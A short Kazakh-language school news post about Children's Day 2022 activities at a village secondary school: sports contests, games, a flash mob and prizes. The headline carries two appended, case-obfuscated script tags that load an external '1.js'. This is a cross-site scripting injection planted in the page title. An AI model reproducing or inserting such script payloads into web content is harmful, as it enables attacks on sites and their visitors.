"Балалар күлкісі - әлемнің көркі"<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
01.06.2022
1 маусым - Халықаралық балаларды қорғау күніне орай, "Еркіншілік ауылының жалпы орта білім беретін мектебі КММ - де іс - шаралар өтті. Мектеп мерекеге сай безендірілді. 2022 жыл- "Балалар жылы" деп жарияланып, балаларға ерекше назар аударылған. Себебі, олардың амандығы - мемлекетіміздің жарқын болашағының сенімді кепілі. Онда денсаулық сақтау, білім беру және әлеуметтік қамсыздандыру саласында балаларды қорғау мақсатында нақты іс - шаралар жасалды. Өскелең ұрпақтың үйлесімді дамуы мен бақытты балалық - бұл біздің жалпыұлттық міндетіміз. Алдын ала жоспарланып, "Балалар күлкісі - әлемнің көркі" шағын спорттық сайыстар, "Біз бақытты баламыз" тақырыбында көңілді тапқырлар сайысы болды. Спорт алаңында спорттық жалпы жаттығулар, ұлттық ойындар, асфальтқа сурет салу, "Биле - биле" флешмоб ұйымдастырылып, өнерлі балалар ойыны өткізілді. Ондағы жеңімпаздарға мақтау қағаздары мен сыйлықтар берілді. "Бала - өмірдің гүлі" атты мерекелік ән - шашуы балалардың көңілінен шықты. Мереке құтты болсын! Барлығыңызға ашық аспан, бейбіт өмір, бүлдіршіндерге бақытты балалық шақ, әрқашанда сыңғырлаған күлкі тілейміз!
Просмотров: 737